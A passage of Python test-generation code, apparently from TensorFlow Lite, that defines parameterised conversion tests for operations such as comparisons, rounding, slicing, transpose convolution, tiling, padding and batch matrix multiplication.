return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_greater_equal_tests(options):
"""Make a set of tests to do greater_equal."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the greater_equal op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.greater_equal(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_less_tests(options):
"""Make a set of tests to do less."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the less op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.less(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_less_equal_tests(options):
"""Make a set of tests to do less_equal."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the less_equal op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.less_equal(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_floor_tests(options):
"""Make a set of tests to do floor."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the floor op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape"])
out = tf.floor(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(outputs, feed_dict={inputs[0]: input_value})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_ceil_tests(options):
"""Make a set of tests to do ceil."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the ceil op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape"])
out = tf.ceil(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict={inputs[0]: input_value})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_round_tests(options):
"""Build the round op testing graph."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the round op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape"])
out = tf.round(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(outputs, feed_dict={inputs[0]: input_value})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_neg_tests(options):
"""Make a set of tests to do neg."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[1, 3, 4, 3], [5], []],
}]
def build_graph(parameters):
"""Build the neg op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.negative(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [values], sess.run(outputs, feed_dict=dict(zip(inputs, [values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_zeros_like_tests(options):
"""Make a set of tests to do zeros_like."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the zeros_like op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
zeros = tf.zeros_like(input_tensor)
# This maximum node is so that toco can perform the constants-propagation
# through the above zeros_like, which it can't do if the output of the
# zeros_like as an output of the whole graphs (graph outputs can't be
# constants). If toco does not perform such constants-propagation then
# the resulting tflite graph retains the zeros_like as a Fill op, which
# is unsupported by TFLite, even as a custom op.
out = tf.maximum(zeros, input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [values], sess.run(outputs, feed_dict=dict(zip(inputs, [values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
def _make_elementwise_tests(op):
"""Make a set of tests to do element-wise operations."""
def f(options):
"""Actual function that generates examples."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the unary op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape"])
out = op(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict={inputs[0]: input_value})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
return f
@register_make_test_function()
def make_sin_tests(options):
"""Make a set of tests to do sin."""
return _make_elementwise_tests(tf.sin)(options)
@register_make_test_function()
def make_log_tests(options):
"""Make a set of tests to do log."""
return _make_elementwise_tests(tf.log)(options)
@register_make_test_function()
def make_sqrt_tests(options):
"""Make a set of tests to do sqrt."""
return _make_elementwise_tests(tf.sqrt)(options)
@register_make_test_function()
def make_rsqrt_tests(options):
"""Make a set of tests to do 1/sqrt."""
return _make_elementwise_tests(tf.rsqrt)(options)
@register_make_test_function()
def make_square_tests(options):
"""Make a set of tests to do square."""
return _make_elementwise_tests(tf.square)(options)
@register_make_test_function()
def make_where_tests(options):
"""Make a set of tests to do where."""
test_parameters = [
{
"input_dtype": [tf.float32, tf.int32],
"input_shape_set": [([1, 2, 3, 4], [1, 2, 3, 4]),],
"use_where_v2": [False, True],
},
{
"input_dtype": [tf.float32, tf.int32],
"input_shape_set": [([1, 2, 3, 4], [1, 2, 3, 1]),],
"use_where_v2": [True],
},
]
def build_graph(parameters):
"""Build the where op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_set"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input3",
shape=parameters["input_shape_set"][1])
less = tf.less(input_value1, input_value2)
where = tf.where_v2 if parameters["use_where_v2"] else tf.where
out = where(less, input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_set"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_set"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_slice_tests(options):
"""Make a set of tests to do slice."""
# TODO(renjieliu): add test/support for uint8.
test_parameters = [
# 4-D
{
"dtype": [tf.float32, tf.int32, tf.int64, tf.string],
"index_type": [tf.int32, tf.int64],
"input_shape": [[12, 2, 2, 5]],
"begin": [[0, 0, 0, 0], [1, 0, 1, 0]],
"size": [[8, 2, 2, 3], [11, 2, 1, 5]],
},
# 2-D
{
"dtype": [tf.float32, tf.int32, tf.int64, tf.string],
"index_type": [tf.int32, tf.int64],
"input_shape": [[2, 3]],
"begin": [[0, 0], [1, 0]],
"size": [[2, 3], [2, 2]],
},
# 4-D with size -1
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[4, 4, 4, 4]],
"begin": [[0, 0, 0, 0], [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0],
[0, 0, 0, 1]],
"size": [[-1, 1, 1, 1], [1, -1, 1, 1], [1, 1, -1, 1], [1, 1, 1, -1]],
},
]
def build_graph(parameters):
"""Build graph for slice test."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
begin = tf.placeholder(
dtype=parameters["index_type"],
name="begin",
shape=[len(parameters["input_shape"])])
size = tf.placeholder(
dtype=parameters["index_type"],
name="size",
shape=[len(parameters["input_shape"])])
tensors = [input_tensor, begin, size]
out = tf.slice(input_tensor, begin, size)
return tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build inputs for slice test."""
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
index_type = _TF_TYPE_INFO[parameters["index_type"]][0]
begin_values = np.array(parameters["begin"]).astype(index_type)
size_values = np.array(parameters["size"]).astype(index_type)
values = [input_values, begin_values, size_values]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=24)
@register_make_test_function()
def make_conv2d_transpose_tests(options):
"""Make a set of tests to do transpose_conv."""
test_parameters = [{
"input_shape": [[1, 50, 54, 3]],
"filter_shape": [[1, 1, 8, 3], [1, 2, 8, 3], [1, 3, 8, 3], [1, 4, 8, 3]],
"output_shape": [[1, 100, 108, 8]],
"dynamic_output_shape": [True, False],
}, {
"input_shape": [[1, 16, 1, 512]],
"filter_shape": [[4, 1, 512, 512]],
"output_shape": [[1, 32, 1, 512]],
"dynamic_output_shape": [True, False],
}, {
"input_shape": [[1, 128, 128, 1]],
"filter_shape": [[4, 4, 1, 1]],
"output_shape": [[1, 256, 256, 1]],
"dynamic_output_shape": [True, False],
}]
def build_graph(parameters):
"""Build a transpose_conv graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
filter_tensor = tf.placeholder(
dtype=tf.float32, name="filter", shape=parameters["filter_shape"])
input_tensors = [input_tensor, filter_tensor]
if parameters["dynamic_output_shape"]:
output_shape = tf.placeholder(dtype=tf.int32, shape=[4])
input_tensors.append(output_shape)
else:
output_shape = parameters["output_shape"]
out = tf.nn.conv2d_transpose(
input_tensor,
filter_tensor,
output_shape=output_shape,
padding="SAME",
strides=(1, 2, 2, 1))
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(np.float32, parameters["input_shape"]),
create_tensor_data(np.float32, parameters["filter_shape"])
]
if parameters["dynamic_output_shape"]:
values.append(np.array(parameters["output_shape"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
# Since compute output_shape is fairly complicated for
# tf.nn.conv2d_transpose input_sizes argument, so we here first perform a
# "conv2d" operation to get the output, then we use the output to feed in
# tf.nn.conv2d_backprop_input.
# This test will depend on the "conv2d" operation's correctness.
@register_make_test_function()
def make_transpose_conv_tests(options):
"""Make a set of tests to do transpose_conv."""
# Tensorflow only supports equal strides
test_parameters = [{
"input_shape": [[1, 3, 4, 1], [1, 10, 10, 3], [3, 20, 20, 1]],
"filter_size": [[1, 1], [1, 2], [3, 3]],
"strides": [[1, 1, 1, 1], [1, 3, 3, 1]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"],
"channel_multiplier": [1, 2],
}]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_size"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a transpose_conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
filter_input = tf.placeholder(
dtype=tf.float32, name="filter", shape=filter_shape)
conv_outputs = tf.nn.conv2d(
input_tensor,
filter_input,
strides=parameters["strides"],
padding=parameters["padding"],
data_format=parameters["data_format"])
out = tf.nn.conv2d_backprop_input(
input_shape,
filter_input,
conv_outputs,
strides=parameters["strides"],
padding=parameters["padding"],
data_format=parameters["data_format"])
input_tensors = [input_tensor, filter_input]
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
input_shape, filter_shape = get_tensor_shapes(parameters)
values = [
create_tensor_data(np.float32, input_shape),
create_tensor_data(np.float32, filter_shape)
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_tile_tests(options):
"""Make a set of tests to do tile."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.bool],
"input_shape": [[3, 2, 1], [2, 2, 2]],
"multiplier_dtype": [tf.int32, tf.int64],
"multiplier_shape": [[3]]
}]
def build_graph(parameters):
"""Build the tile op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
shape=parameters["input_shape"],
name="input")
multiplier_value = tf.placeholder(
dtype=parameters["multiplier_dtype"],
shape=parameters["multiplier_shape"],
name="multiplier")
out = tf.tile(input_value, multiplier_value)
return [input_value, multiplier_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
multipliers_value = create_tensor_data(
parameters["multiplier_dtype"],
parameters["multiplier_shape"],
min_value=0)
return [input_value, multipliers_value], sess.run(
outputs,
feed_dict={
inputs[0]: input_value,
inputs[1]: multipliers_value
})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_expand_dims_tests(options):
"""Make a set of tests to do expand_dims."""
test_parameters = [{
"input_type": [tf.float32, tf.int32],
"input_shape": [[5, 4]],
"axis_value": [0, 1, 2, -1, -2, -3],
"constant_axis": [True, False],
}]
def build_graph(parameters):
"""Build the where op testing graph."""
inputs = []
input_value = tf.placeholder(
dtype=parameters["input_type"],
name="input",
shape=parameters["input_shape"])
inputs.append(input_value)
if parameters["constant_axis"]:
axis_value = tf.constant(
parameters["axis_value"], dtype=tf.int32, shape=[1])
else:
axis_value = tf.placeholder(dtype=tf.int32, name="axis", shape=[1])
inputs.append(axis_value)
out = tf.expand_dims(input_value, axis=axis_value)
return inputs, [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = []
input_values.append(
create_tensor_data(parameters["input_type"], parameters["input_shape"]))
if not parameters["constant_axis"]:
input_values.append(np.array([parameters["axis_value"]], dtype=np.int32))
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_sparse_to_dense_tests(options):
"""Make a set of tests to do sparse to dense."""
test_parameters = [{
"value_dtype": [tf.float32, tf.int32, tf.int64],
"index_dtype": [tf.int32, tf.int64],
"value_count": [1, 3, 6, 8],
"dense_shape": [[15], [3, 10], [4, 4, 4, 4], [7, 10, 9]],
"default_value": [0, -1],
"value_is_scalar": [True, False],
}]
# Return a single value for 1-D dense shape, but a tuple for other shapes.
def generate_index(dense_shape):
if len(dense_shape) == 1:
return np.random.randint(dense_shape[0])
else:
index = []
for shape in dense_shape:
index.append(np.random.randint(shape))
return tuple(index)
def build_graph(parameters):
"""Build the sparse_to_dense op testing graph."""
dense_shape = parameters["dense_shape"]
# Special handle for value_is_scalar case.
# value_count must be 1.
if parameters["value_is_scalar"] and parameters["value_count"] == 1:
value = tf.placeholder(
name="value", dtype=parameters["value_dtype"], shape=())
else:
value = tf.placeholder(
name="value",
dtype=parameters["value_dtype"],
shape=[parameters["value_count"]])
indices = set()
while len(indices) < parameters["value_count"]:
indices.add(generate_index(dense_shape))
indices = tf.constant(tuple(indices), dtype=parameters["index_dtype"])
# TODO(renjieliu): Add test for validate_indices case.
out = tf.sparse_to_dense(
indices,
dense_shape,
value,
parameters["default_value"],
validate_indices=False)
return [value], [out]
def build_inputs(parameters, sess, inputs, outputs):
if parameters["value_is_scalar"] and parameters["value_count"] == 1:
input_value = create_scalar_data(parameters["value_dtype"])
else:
input_value = create_tensor_data(parameters["value_dtype"],
[parameters["value_count"]])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_pack_tests(options):
"""Make a set of tests to do stack."""
test_parameters = [
# Avoid creating all combinations to keep the test size small.
{
"dtype": [tf.float32],
"base_shape": [[3, 4, 3], [3, 4], [5]],
"num_tensors": [1, 2, 3, 4, 5, 6],
"axis": [0, 1, 2, 3],
"additional_shape": [1, 2, 3],
},
{
"dtype": [tf.int32],
"base_shape": [[3, 4, 3], [3, 4], [5]],
"num_tensors": [6],
"axis": [0, 1, 2, 3],
"additional_shape": [1, 2, 3],
},
{
"dtype": [tf.int64],
"base_shape": [[3, 4, 3], [3, 4], [5]],
"num_tensors": [5],
"axis": [0, 1, 2, 3],
"additional_shape": [1, 2, 3],
}
]
def get_shape(parameters):
"""Return a tweaked version of 'base_shape'."""
axis = parameters["axis"]
shape = parameters["base_shape"][:]
if axis < len(shape):
shape[axis] += parameters["additional_shape"]
return shape
def build_graph(parameters):
all_tensors = []
for n in range(0, parameters["num_tensors"]):
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name=("input%d" % n),
shape=get_shape(parameters))
all_tensors.append(input_tensor)
out = tf.stack(all_tensors, parameters["axis"])
return all_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
all_values = []
for _ in range(0, parameters["num_tensors"]):
input_values = create_tensor_data(np.float32, get_shape(parameters))
all_values.append(input_values)
return all_values, sess.run(
outputs, feed_dict=dict(zip(inputs, all_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=72)
@register_make_test_function()
def make_unpack_tests(options):
"""Make a set of tests to do unstack."""
test_parameters = [{
"base_shape": [[3, 4, 3], [3, 4], [5, 6, 7, 8]],
"axis": [0, 1, 2, 3],
}]
def get_valid_axis(parameters):
"""Return a tweaked version of 'axis'."""
axis = parameters["axis"]
shape = parameters["base_shape"][:]
while axis > len(shape) - 1:
axis -= 1
return axis
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name=("input"), shape=parameters["base_shape"])
outs = tf.unstack(input_tensor, axis=get_valid_axis(parameters))
return [input_tensor], [outs[0]]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(np.float32, shape=parameters["base_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_range_tests(options):
"""Make a set of tests to do range."""
test_parameters = [{
"dtype": [tf.int32, tf.float32],
"offset": [10, 100, 1000],
"delta": [1, 2, 3, 4, -1, -2, -3, -4],
}]
def build_graph(parameters):
"""Build the range op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"], name=("start"), shape=[])
if parameters["delta"] < 0:
offset = parameters["offset"] * -1
else:
offset = parameters["offset"]
delta = parameters["delta"]
limit_tensor = input_tensor + offset
delta_tensor = tf.constant(delta, dtype=parameters["dtype"])
out = tf.range(input_tensor, limit_tensor, delta_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_scalar_data(parameters["dtype"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_fill_tests(options):
"""Make a set of tests to do fill."""
test_parameters = [{
"dims_dtype": [tf.int32, tf.int64],
"dims_shape": [[], [1], [3], [3, 3]],
"value_dtype": [tf.int32, tf.int64, tf.float32],
}]
def build_graph(parameters):
"""Build the fill op testing graph."""
input1 = tf.placeholder(
dtype=parameters["dims_dtype"],
name="dims",
shape=parameters["dims_shape"])
input2 = tf.placeholder(
dtype=parameters["value_dtype"], name="value", shape=[])
out = tf.fill(input1, input2)
return [input1, input2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input1 = create_tensor_data(parameters["dims_dtype"],
parameters["dims_shape"], 1)
input2 = create_scalar_data(parameters["value_dtype"])
return [input1, input2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input1, input2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=12)
def _make_logical_tests(op):
"""Make a set of tests to do logical operations."""
def logical(options, expected_tf_failures=0):
"""Generate examples."""
test_parameters = [{
"input_shape_pair": [([], []), ([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the logical testing graph."""
input_value1 = tf.placeholder(
dtype=tf.bool, name="input1", shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=tf.bool, name="input2", shape=parameters["input_shape_pair"][1])
out = op(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(tf.bool,
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(tf.bool,
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
return logical
@register_make_test_function()
def make_logical_or_tests(options):
"""Make a set of tests to do logical_or."""
return _make_logical_tests(tf.logical_or)(options, expected_tf_failures=1)
@register_make_test_function()
def make_logical_and_tests(options):
"""Make a set of tests to do logical_and."""
return _make_logical_tests(tf.logical_and)(options, expected_tf_failures=1)
@register_make_test_function()
def make_logical_xor_tests(options):
"""Make a set of tests to do logical_xor.
Test logical_not as well.
"""
return _make_logical_tests(tf.logical_xor)(options, expected_tf_failures=1)
@register_make_test_function()
def make_mirror_pad_tests(options):
"""Make a set of tests to do mirror_pad."""
test_parameters = [
{
"input_shape": [[2, 3]],
"padding_matrix": [[[1, 1], [2, 1]]],
"mode": ["REFLECT"],
"type": ["const"]
},
{
"input_shape": [[2, 3]],
"padding_matrix": [[[1, 1], [1, 1]]],
"mode": ["REFLECT"],
"type": ["const"]
},
{
"input_shape": [[2, 3]],
"padding_matrix": [[[1, 1], [2, 1]]],
"mode": ["SYMMETRIC"],
"type": ["placeholder"]
},
{
"input_shape": [[2, 3]],
"padding_matrix": [[[1, 1], [2, 1]]],
"mode": ["REFLECT"],
"type": ["placeholder"]
},
{
"input_shape": [[3]],
"padding_matrix": [[[0, 2]]],
"mode": ["SYMMETRIC"],
"type": ["placeholder"]
},
{
"input_shape": [[3]],
"padding_matrix": [[[0, 2]]],
"mode": ["SYMMETRIC"],
"type": ["const"]
},
{
"input_shape": [[3]],
"padding_matrix": [[[0, 2]]],
"mode": ["REFLECT"],
"type": ["const"]
},
{
"input_shape": [[3, 2, 4, 5]],
"padding_matrix": [[[1, 1], [2, 2], [1, 1], [1, 1]]],
"mode": ["SYMMETRIC"],
"type": ["placeholder"]
},
]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.int32, name="input", shape=parameters["input_shape"])
if parameters["type"] != "const":
padding_matrix = tf.placeholder(
dtype=tf.int32,
name="padding",
shape=[len(parameters["input_shape"]), 2])
input_tensors = [input_tensor, padding_matrix]
else:
padding_matrix = tf.constant(np.array(parameters["padding_matrix"]))
input_tensors = [input_tensor]
output = tf.pad(
input_tensor, paddings=padding_matrix, mode=parameters["mode"])
return input_tensors, [output]
def build_inputs(parameters, sess, inputs, outputs):
input_values = [create_tensor_data(tf.int32, parameters["input_shape"])]
if parameters["type"] != "const":
input_values.append(np.array(parameters["padding_matrix"]))
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_unroll_batch_matmul_tests(options):
"""Make a set of tests to test unroll_batch_matmul."""
# The test cases below requires broadcasting support (BatchMatMulV2 semantic),
# whis isn't supported as of this change.
broadcast_shape_params = [
# Simple broadcast.
[(1, 2, 3), (3, 5), False, False],
# Empty batch broadcast.
[(2, 5, 3), (3, 7), False, False],
# Single batch with non-empty batch broadcast.
[(1, 5, 3), (4, 3, 7), False, False],
# Broadcast both operands
[(3, 1, 5, 3), (1, 4, 3, 7), False, False],
]
test_parameters = [{
"dtype": [tf.float32],
"shape": [
[(2, 2, 3), (2, 3, 2), False, False],
[(2, 2, 3), (2, 3, 2), True, True],
[(2, 2, 3), (2, 2, 3), False, True],
[(2, 2, 3), (2, 2, 3), True, False],
[(4, 2, 2, 3), (4, 2, 3, 2), False, False],
[(4, 2, 2, 3), (4, 2, 3, 2), True, True],
[(4, 2, 2, 3), (4, 2, 2, 3), False, True],
[(4, 2, 2, 3), (4, 2, 2, 3), True, False]
] + broadcast_shape_params,
# TODO(b/130887442): Improve the forward compatibility tests for every
# ops.
"forward_compatibility_test": [False, True],
}]
def build_graph(parameters):
"""Build the batch_matmul op testing graph."""
def _build_graph():
input_tensor1 = tf.placeholder(
dtype=parameters["dtype"], shape=parameters["shape"][0])
input_tensor2 = tf.placeholder(
dtype=parameters["dtype"], shape=parameters["shape"][1])
# Should be unrolled and replaced with fully_connected ops in the end.
out = tf.matmul(
input_tensor1,
input_tensor2,
transpose_a=parameters["shape"][2],
transpose_b=parameters["shape"][3])
return [input_tensor1, input_tensor2], [out]
if parameters["forward_compatibility_test"]:
# This is hardcoded to the date after MatMulV2 is activated.
# TODO(b/130887442): Improve the forward compatibility tests for every
# ops, and remove the hardcoded date.
with tf.compat.forward_compatibility_horizon(2019, 4, 26):
return _build_graph()
else:
return _build_graph()
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(
parameters["dtype"], shape=parameters["shape"][0])
input_value2 = create_tensor_data(
parameters["dtype"], shape=parameters["shape"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_placeholder_with_default_tests(options):
"""Make a set of tests to test placeholder_with_default."""
test_parameters = [{
"dtype": [tf.float32, tf.int32, tf.int64],
}]
def build_graph(parameters):
"""Build the placeholder_with_default testing graph."""
const_node = tf.constant(
[1, 2, 2, 0], shape=[2, 2], dtype=parameters["dtype"])
input_tensor = tf.placeholder_with_default(
const_node, shape=[2, 2], name="input")
out = tf.equal(input_tensor, const_node, name="output")
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
numpy_type = _TF_TYPE_INFO[parameters["dtype"]][0]
input_value = np.array([[1, 0], [2, 1]], numpy_type)
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_unique_tests(options):
"""Make a set of tests for Unique op."""
test_parameters = [
{
"input_shape": [[1]],
"index_type": [tf.int32, tf.int64, None],
"input_values": [3]
},
{
